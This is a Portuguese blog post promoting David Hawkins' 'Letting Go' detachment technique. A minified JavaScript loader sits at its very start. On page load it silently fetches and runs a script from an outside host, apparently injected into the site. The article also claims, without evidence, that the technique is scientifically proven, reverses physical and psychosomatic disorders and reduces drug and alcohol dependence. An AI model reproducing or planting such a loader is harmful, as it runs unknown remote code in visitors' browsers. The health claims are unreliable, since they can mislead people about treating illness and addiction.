;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); Desapego: A Técnica Definitiva para Praticar | David Hawkins Brasil
Categorias
David Hawkins

Desapego – Uma técnica simples e eficaz

No último artigo, falamos sobre a existência de uma técnica chamada ‘Deixar ir’, objeto do livro de mesmo nome, escrito pelo PhD Dr. David Hawkins. E vamos continuar entendendo ainda mais essa técnica que pode colaborar para o desapego do sofrimento e da negatividade.

A prática psiquiátrica sempre teve como objetivo primário aliviar o sofrimento humano e utiliza para isso numerosas disciplinas como psicanálise, psicologia, técnicas comportamentais, biofeedback entre outras tantas e, em todas elas, as explorações do mecanismo da rendição trouxe benefícios práticos no que se refere ao desapego.

E essa é a razão que levou Dr. David Hawkins a escrever esse livro, para compartilhar suas observações clínicas pessoais e experimentadas e explorando as questões que denotam obstáculos para a Iluminação.

Como lidar com as perdas, decepções, estresses e crises?

É possível praticar o desapego nessas situações?

De que forma se livrar de emoções negativas e de seus impactos para a saúde, relacionamentos, trabalho?

Desapego – o desejo de libertar-se dos sentimentos negativos

Também chamado de mecanismo de rendição, é um sistema pragmático para eliminar obstáculos e apegos e a técnica tem provas cientificas que pode ser mais efetiva nas respostas fisiológicas ao estresse.

Seu valor está na simplicidade, eficiência, eficácia clínica, ausência de conceitos questionáveis bem como resultados tangíveis e rápidos.

Atua diretamente sobre a máxima: “o apego é a causa primária do sofrimento.”

A mente por meio de seus pensamentos, é movida por sentimentos. Cada sentimento é um acúmulo de milhares de pensamentos.

No geral, as pessoas suprimem, reprimem e tentam escapar dos sentimentos, têm dificuldades com o desapego desses sentimentos, gerando energia suprimida que se acumula e vai se expressar como estresse psicossomático, transtornos corporais, doenças emocionas e transtornos comportamentais em suas relações interpessoais.

Essa dinâmica de se acumular sentimentos vai bloqueando o crescimento espiritual e a consciência e o sucesso em muitas áreas da vida.

E quais os benefícios de praticar o desapego?

No âmbito da saúde física

Eliminar os sentimentos suprimidos traz principalmente uma diminuição do excesso de energia sobre o sistema nervoso autônomo. Render-se constantemente faz com que transtornos físicos e psicossomáticos sejam revertidos, melhorados ou até mesmo desapareçam por completo.

No âmbito comportamental

As dependências a drogas, álcool, entretenimento e sono excessivo são fugas utilizadas para aplacar a ansiedade e os sentimentos negativos que diminuem progressivamente com o uso da técnica do ‘deixar ir”.

Em contrapartida, observa-se no indivíduo que se utiliza dela uma maior vitalidade, energia, estado de presença e um bem-estar maior, sendo necessário cada vez menos esforço para obter esse bem-estar.

No âmbito das Relações Interpessoais

Quando sentimentos negativos são rendidos, abre-se espaço para pensamentos positivos que trarão melhoras inclusive na forma de se relacionar e a capacidade de amar aumenta. Os conflitos diminuem e o desempenho no geral melhora.

O desapego dos bloqueios negativos concede espaço para que os objetivos vocacionais sejam mais facilmente alcançados. A autossabotagem que está baseada na culpa também diminui. O conhecimento intuitivo se manifesta mais fortemente que o conhecimento intelectual.

Novas habilidades criativas podem ser descobertas e a dependência – estado que traz dor, sofrimento e até mesmo violência – também diminui. A aceitação e o amor ao próximo tomam maiores proporções.

No âmbito consciencial e espiritual

A partir do momento em que amplio o uso da técnica do ‘deixar ir’ abre-se um espaço para que a consciência se amplie e a espiritualidade se desenvolva em seu mais puro conceito. A felicidade, o contentamento, a alegria e a paz surgem e experimenta-se cada vez mais o verdadeiro Eu Interior. Os ensinamentos dos Grandes Mestres se desdobram e vai-se desapegando das limitações.

Qualquer pessoa pode experimentar o desaparecimento da negatividade e deixar fluir dentro de si uma positividade alinhada com a verdade e o amor. “Deixar Ir” é uma cartilha que nos ensina passo a passo como lidar e transcender com cada um dos estados de consciência em busca da iluminação.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *